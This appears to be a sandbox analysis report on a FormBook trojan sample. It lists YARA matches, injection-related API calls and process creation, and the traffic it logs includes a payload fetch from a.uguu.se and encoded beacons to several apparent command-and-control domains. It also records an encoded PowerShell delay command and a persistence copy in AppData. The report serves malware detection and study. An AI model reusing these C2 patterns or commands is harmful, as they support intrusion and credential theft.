          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SC_0017384.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C6AA0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C5390
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C5317
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016CF390
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C774D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 0_2_016C7960
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00403853
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00401B30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004055B3
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_00420633
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040BF6F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040BF73
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004057D3
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004017D8
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_004017E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176F900
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018320A8
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018328EC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821002
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183E824
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B090
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182DBD2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832B28
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179EBB0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018322AE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01760D20
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018325DD
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832D07
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831D55
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177841F
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182D466
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831FF1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01786E30
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01832EF7
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182D616
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: String function: 0176B150 appears 35 times
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E543 NtCreateFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E5F3 NtReadFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E673 NtClose,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0041E723 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96D0 NtCreateKey,
          Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000000.299213508.0000000000D98000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
          Source: SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000003.381474937.0000000001523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000003.383573088.00000000016CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exe, 00000003.00000002.432025851.000000000185F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
          Source: SC_0017384.exeBinary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
          Source: SC_0017384.exeReversingLabs: Detection: 12%
          Source: SC_0017384.exeVirustotal: Detection: 17%
          Source: C:\Users\user\Desktop\SC_0017384.exeFile read: C:\Users\user\Desktop\SC_0017384.exeJump to behavior
          Source: SC_0017384.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SC_0017384.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Users\user\Desktop\SC_0017384.exeFile created: C:\Users\user\AppData\Roaming\JqtuyobJump to behavior
